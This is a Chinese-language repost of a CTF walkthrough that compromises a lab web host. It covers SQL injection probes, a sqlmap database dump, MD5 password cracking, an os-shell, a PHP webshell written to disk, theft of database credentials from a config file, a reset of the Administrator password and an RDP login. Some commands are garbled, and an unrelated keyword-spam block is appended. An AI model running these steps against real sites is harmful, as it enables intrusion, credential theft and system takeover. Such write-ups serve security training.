千家信息网

CTF主机渗透的方法是什么

发表于:2024-09-21 作者:千家信息网编辑
千家信息网最后更新 2024年09月21日,这篇文章主要介绍了CTF主机渗透的方法是什么的相关知识,内容详细易懂,操作简单快捷,具有一定借鉴价值,相信大家阅读完这篇CTF主机渗透的方法是什么文章都会有所收获,下面我们一起来看看吧。第一步:首先打
千家信息网最后更新 2024年09月21日CTF主机渗透的方法是什么

这篇文章主要介绍了CTF主机渗透的方法是什么的相关知识,内容详细易懂,操作简单快捷,具有一定借鉴价值,相信大家阅读完这篇CTF主机渗透的方法是什么文章都会有所收获,下面我们一起来看看吧。

第一步:首先打开连接地址: http://202.0.0.207

第二步:寻找漏洞点,点击页面的时候,我们看到是PHP的网站,以及url中的参数名为cid,那我们可以使用sql注入试试,看是否存在sql注入漏洞

我们使用手工判断方法:

http://202.0.0.207/product.php?cid=3', 页面异常

http://202.0.0.207/product.php?cid=3 and 1=1,正常

http://202.0.0.207/product.php?cid=3 and 1=2,异常

从而判断此处一定存在sql注入漏洞,且参数类型为整型。

这里我们可以使用盲注来手工注入。因为sqlmap也支持盲注类型,所有为了节约时间我们就使用sqlmap来脱库吧!

第二步:使用sqlmap来脱库

sqlmap -u http://202.0.0.207/product.php?cid=3

此参数爆出时间盲注和联合注入攻击可以实现。

接下来我们直接开始跑库吧

sqlmap -u http://202.0.0.207/product.php?cid=3 -dbs

我们选择510cms数据库来爆吧

sqlmap -u http://202.0.0.207/product.php?cid=3 -D 510cms -tables

再来爆510_admin试试

sqlmap -u http://202.0.0.207/product.php?cid=3 -D 510cms -T 510_admin --columns

接下来爆数据

sqlmap -u http://202.0.0.207/product.php?cid=3 -D 510cms -T 510_admin -C id,mid,name,passwd,remark -dump

然后我们想要admin用户的密码:8dbdf8221fcf4bd6ac5a48317baa948c,在线MD5解密后得到密码为adminlwphp

第三步:我们接下来就去找后台登录页面了

这里我使用御剑后台扫描器

首先我们还是看登录页面的源码,看是不是有flag,果然如此,在这里拿到一个flag3{d3eac3a68b7d3863cc7bd45ba948195d}

接下来我们使用爆库出来的管理员账户和密码登录:admin/ adminlwphp,登录成功

第四步:胡乱捣腾

进入后台后,现在也只有到处去收集有用信息,看下有没有直接拿flag的地方了。一不小心,突然看到了网站绝对路径C:/www/,那根据前面爆出的sql注入漏洞,我们能不能拿到cmdshell呢?我们接下来尝试一下

sqlmap -u http://202.0.0.207/product.php?cid=3 --os-shell

果然拿到了cmdshell,真XX是一个惊喜,那么我们接下就看下现在拥有的系统权限是什么

第五步:一句话木马上传及利用

接下来就直接写入一句话木马了

echo ^>C:/WWW/shell.php

接下来我们上菜刀工具

连接成功

第六步:胡乱捣腾

下面看到这么多页面心头就开始发慌,又得漫山遍野的去收集flag了,

在网站根目录发现flag.php文件,发现flag1=flag1{6ab7c0c46b171d04f1cab922c2f9f017}

花了10多分钟,再也没有找到flag,那只有想其他的办法了。在configs中找到config.php,这个是数据库的配置文件,我们得到了数据库连接的账户root密码为windpasssql

我们使用菜刀对数据库进行连接

提交后,连接成功

继续看这里有没有flag,又拿到一个flag=flag2{981c05134c56092b83b3e9c9b4116ac1}

我们使用菜刀工具进入虚拟终端,看下目前的权限是什么,需要提权不?结果发现是system权限,

执行命令netstat -an查看3389端口已经开启

et user administrator godun.f

修改管理员密码为godun.f,

然后远程桌面登录远程主机

拿到flag=flag4{e97950cb2dea110c53cb599abc826268}

拿到了4个flag,还有一个不知道藏在哪里,我们还得继续找,找了半天,最后在,C盘的根目录下找到了flag5{c3bc1e7b8325d75816e1ca8ae5ae72ad}

最后,到此为止,5个flag全部找出来了,接下来我们把5个flag放入答题框

关于"CTF主机渗透的方法是什么"这篇文章的内容就介绍到这里,感谢各位的阅读!相信大家对"CTF主机渗透的方法是什么"知识都有一定的了解,大家如果还想学习更多知识,欢迎关注行业资讯频道。

接下来 主机 方法 密码 数据 页面 登录 数据库 漏洞 成功 参数 后台 权限 知识 网站 一句话 内容 只有 工具 手工 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 软件开发公司属于哪一类高企 提供以下专利文献数据库加密方法 数据库模型按照什么来划分的 世界互联网大会忽略的黑科技 网络安全基础要求 mdb数据库查看器 沈职计算机网络技术录取分数线 科技公司互联网公司硕士待遇 枣庄网络安全执法 北京果合网络技术有限公司 软件开发 发票名称 好玩的魔兽单机数据库 macbookpro网络安全 国家网络安全界的黄埔军校 安装数据库显示网络 大手互联网科技有限公司 如何解释通达信服务器 合肥八八六软件开发有限公司 甘肃省公安厅网络安全的现状 昆明软件开发工程师培训排行 网络安全的征文开头 服务器带外管理装系统 营销软件开发公司简介 义乌物流软件开发自学步骤 软件开发工程师有年龄限制吗 软件开发岗位需要考哪些证 软件开发成熟度证书查询 数据库查询并保存到一张新表 铁岭互助盘软件开发价格 数据库创建具体操作步骤
0